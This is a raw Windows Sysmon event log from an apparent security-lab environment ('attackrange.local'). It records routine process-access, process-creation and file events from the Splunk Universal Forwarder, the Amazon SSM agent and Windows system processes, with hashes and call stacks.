Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000981784Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:26.364{69CF5F33-8E42-6151-2A7A-00000000FD01}4048C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000981783Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:26.254{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DBD12FFB2C8DBDC39C100667158CA48B,SHA256=0680704CE156DBAC977B51BFBA6097036295BF2E75137A12B06C2248DCD3837D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981782Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:26.179{69CF5F33-7F28-614D-1C00-00000000FD01}1852NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0a7b4daf9c254f4db\channels\health\surveyor-20210924073257-4323MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000981828Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:27.882{69CF5F33-8E43-6151-2C7A-00000000FD01}10763296C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981827Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:27.694{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8E43-6151-2C7A-00000000FD01}1076C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981826Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:27.694{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981825Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:27.694{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981824Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:27.694{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981823Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:27.694{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981822Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:27.694{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981821Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:27.694{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981820Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:27.694{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981819Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:27.694{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981818Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:27.694{69CF5F33-7F27-614D-0500-00000000FD01}408980C:\Windows\system32\csrss.exe{69CF5F33-8E43-6151-2C7A-00000000FD01}1076C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000981817Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:27.694{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981816Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:27.694{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8E43-6151-2C7A-00000000FD01}1076C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000981815Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:27.680{69CF5F33-8E43-6151-2C7A-00000000FD01}1076C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000981814Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:27.601{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7362E086B5A98B01ED6D4B99A37CF923,SHA256=44C683479FEB5D60AF68050FE4B5DC17E5EEC4F1419B8352CC6E96A1EC2F0785,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057435Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:27.440{5EBD8912-8CD0-6151-2F00-00000000FD01}2544NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0fd64d26ae25a9a58\channels\health\surveyor-20210927092016-006MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057434Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:27.204{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D6CD9FD1155FDE219929D5B9228D63DB,SHA256=C2EE33B560C01BDA51BD1062D76781966352190A4909C47E6FE62BBA452D8E44,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981813Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:27.553{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7AE9A956B579A0F6737F878AFF44145E,SHA256=4A07904A2FCCBB97B5944833231F1E7E4BB0FD068D91454494329D9DE6C25748,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000981812Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:27.069{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8E43-6151-2B7A-00000000FD01}2824C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981811Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:27.069{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981810Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:27.069{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981809Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:27.069{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981808Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:27.069{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981807Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:27.069{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981806Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:27.069{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981805Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:27.053{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981804Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 